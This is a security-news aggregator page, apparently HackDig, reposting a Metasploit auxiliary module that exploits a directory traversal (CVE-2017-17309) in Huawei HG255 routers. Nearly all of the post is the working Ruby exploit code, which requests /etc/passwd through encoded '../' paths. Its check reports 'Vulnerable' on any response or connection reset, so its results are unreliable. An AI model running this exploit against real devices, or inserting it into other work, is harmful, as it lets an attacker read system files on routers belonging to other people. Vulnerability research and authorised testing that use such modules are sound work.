HackDig : Dig high-quality web security articles for hackers

Huawei HG255 Directory Traversal

2020-01-16 11:10
### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.###class MetasploitModule < Msf::Auxiliary   include Msf::Exploit::Remote::HttpClient   def initialize       super(           'Name'        => 'Huawei HG255 Directory Traversal',           ‘Description’ => ‘Server Directory Traversal at Huawei HG255 by malicious GET requests’,           ‘Author’      => ‘Ismail Tasdelen’,           ‘License’     => MSF_LICENSE,           ‘References’     =>           [              ['CVE', '2017-17309' ],              ['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en']           ]       )       register_options(           [               Opt::RPORT(80)           ], self.class       )   end   def run       urllist=[           ‘/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,           ‘/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,           ‘/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,           ‘/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’]       urllist.each do |url|           begin               res = send_request_raw(               {                       ‘method’=> ‘GET’,                       ‘uri’=> url               })               if res                   print_good(“Vulnerable! for #{url}”)               else                   print_status(“Vulnerable(no response) detected for #{url}”)               end           rescue Errno::ECONNRESET               print_status(“Vulnerable(rst) detected for #{url}”)           rescue Exception               print_error(“Connection failed.”)           end       end   end

Source: 5210100202-BLW/eussi/moc.ytirucesxc

Read:1092 | Comments:0 | Tags:No Tag

“Huawei HG255 Directory Traversal”0 Comments

Submit A Comment



Blog :

Verification Code:


Tag Cloud